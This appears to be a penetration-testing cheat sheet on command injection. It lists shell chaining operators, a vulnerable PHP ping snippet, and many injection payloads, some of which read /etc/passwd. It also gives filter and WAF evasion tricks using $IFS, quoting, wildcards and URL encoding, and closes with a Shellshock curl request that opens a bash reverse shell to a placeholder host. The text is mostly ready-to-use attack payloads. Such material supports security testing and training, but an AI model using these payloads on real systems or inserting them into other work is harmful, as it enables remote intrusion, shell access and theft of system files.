Command Injection (RCE)

Resource

• PayloadsAllTheThings
• Hacktricks - Best parameters (Google Dorking)

🔗 Chaining Commands

Common operators used in Unix-based systems to chain or control command execution:

• ; (Semicolon): Run multiple commands in sequence, no matter what.
• && (AND): Run the second command only if the first one succeeds.
• || (OR): Run the second command only if the first one fails.
• & (Background): Run the command in the background.
• | (Pipe): Pipe the output of one command into another.

ls; whoami   # Execute both
ls && whoami # Execute whoami only if ls succeeds
ls || whoami # Execute whoami only if ls fails
ls & whoami  # Execute ls in the background
ls | whoami  # Pipe the output of ls into whoami

# Only Unix supported
`ls` # ``
$(ls) # $()
{ls,}
{ls,-a}
ls; id # ; Chain commands

# Not execute but may be interesting
> /var/www/html/out.txt # Try to redirect the output to a file
< /etc/passwd # Try to send some input to the command

Other Useful Tricks

`cmd`         Run a command and substitute its output (backticks).
$(cmd)        Same as above, but more readable (modern syntax).
> file        Write command output to a file (overwrite).
>> file       Append command output to a file.
< file        Use a file as input to a command.
$IFS          Replace space with the Internal Field Separator (used to bypass filters).
%0a / \n      Inject a newline (useful in URLs or headers).
#             Comment out the rest of the line (bypass appended code).
cat<<EOF      Inject multi-line input (heredoc).

🧨 Filter Bypass

If the user input is not properly escaped, the attacker can execute an illegitimate command :

# vuln code
$target = $_POST['ip'];
system("ping -c 4 $target");

# Basic
127.0.0.1 |ls
|ls
;|ls
;ls
&id
&&|ls
||ls

# print like error in output
`cat /etc/passwd`
$(id)

# IFS tricks
ls${IFS}-a

Quotes & Slash

"w""ho""ami"
i'''d
i"""d
w\ho\am\i
/\b\i\n////sh
/\b\i\n/////s\h

Url Encode

ls %0a id # %0A
ls %09 id
ls%0B id
ls%0Cid
127.0.0.1%0a id # LF and whitespace
127.0.0.1%0d%0aid # CRLF

8.8.8.8%26ls # 8.8.8.8&ls
8.8.8.8%3Bls # 8.8.8.8;ls
invalid%7C%7Cwhoami # invalid||whoami

# print like error in output
%3E(whoami) # >(whoami)
%60id%60    # `id`

🛡️ WAF Evasion

$0 -c "whoami"              # $0 = /bin/bash
ls$((123-123))-a            # Arithmetic bypass
${PWD:0:1}bin${PWD:0:1}bash # String slicing
$(echo l$(echo s))          # obfuscate

# Wildcard
cat /e?c/p?ss??
cat /e??/??ss*

# $()
who$()ami

# Backslash + Newline
$ cat /et\
c/pa\
sswd

-> cat%20/et%5C%0Ac/pa%5C%0Asswd

🐚 Shellshock

() { :;}; echo exploit

# Exploit
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ip/port 0>&1" http://example.com/